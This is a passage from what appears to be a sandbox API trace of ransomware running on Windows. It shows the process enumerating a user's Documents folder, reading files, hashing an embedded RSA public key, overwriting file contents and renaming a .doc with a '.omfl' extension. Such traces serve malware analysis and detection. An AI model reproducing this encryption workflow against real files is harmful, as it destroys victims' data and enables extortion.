Flags=0x0, Size=0x4c) returned 0x757ca08 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.977] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.977] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e78 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e90 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e60 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.978] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.978] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ea8 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e78 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16e78 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e78 | out: hHeap=0x4970000) returned 1 [0130.979] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.979] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.980] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ea8 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e90 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e60 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16e48 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd346f8 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.981] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x12220, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x12220, lpOverlapped=0x0) returned 1 [0130.981] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0130.981] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12225, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.981] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.982] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5b50 | out: hHeap=0x4970000) returned 1 [0130.982] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.982] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.982] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.982] CloseHandle (hObject=0x5c8) returned 1 [0130.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0130.990] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3110 | out: hHeap=0x4970000) returned 1 [0130.990] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ONQxwUE ucU-gmTaxkP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\onqxwue ucu-gmtaxkp.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ONQxwUE ucU-gmTaxkP.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\onqxwue ucu-gmtaxkp.doc.omfl")) returned 1 [0130.991] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.991] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.991] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0130.993] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x16c) returned 0xdd1ba90 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a80 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2aa0 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b18 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e6a0 [0130.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e718 [0130.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5d58 | out: hHeap=0x4970000) returned 1 [0130.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5fc8 | out: hHeap=0x4970000) returned 1 [0130.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2c08 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2c80 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2de8 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d28c0 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d28c0 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2cf8 | out: hHeap=0x4970000) returned 1 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0130.994] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99848850, ftCreationTime.dwHighDateTime=0x1d59e11, ftLastAccessTime.dwLowDateTime=0xce433dc0, ftLastAccessTime.dwHighDateTime=0x1d5c2b5, ftLastWriteTime.dwLowDateTime=0xce433dc0, ftLastWriteTime.dwHighDateTime=0x1d5c2b5, nFileSizeHigh=0x0, nFileSizeLow=0x10907, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6OydQcGCqGw2QEx.xlsx", cAlternateFileName="P6OYDQ~1.XLS")) returned 1 [0130.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.994] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P6OydQcGCqGw2QEx.xlsx") returned=".xlsx" [0130.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\P6OydQcGCqGw2QEx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p6oydqcgcqgw2qex.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.994] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=67847) returned 1 [0130.994] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.998] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x108e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.998] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.999] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.999] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x10907, lpOverlapped=0x0) returned 1 [0131.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.000] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.001] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.001] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.001] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.001] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.001] GetLastError () returned 0x0 [0131.001] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.001] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.002] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.002] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.002] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10910) returned 0xdd35410 [0131.002] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd346f8 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e48 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34740 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e60 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e90 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ea8 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.003] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.003] HeapFree (in: 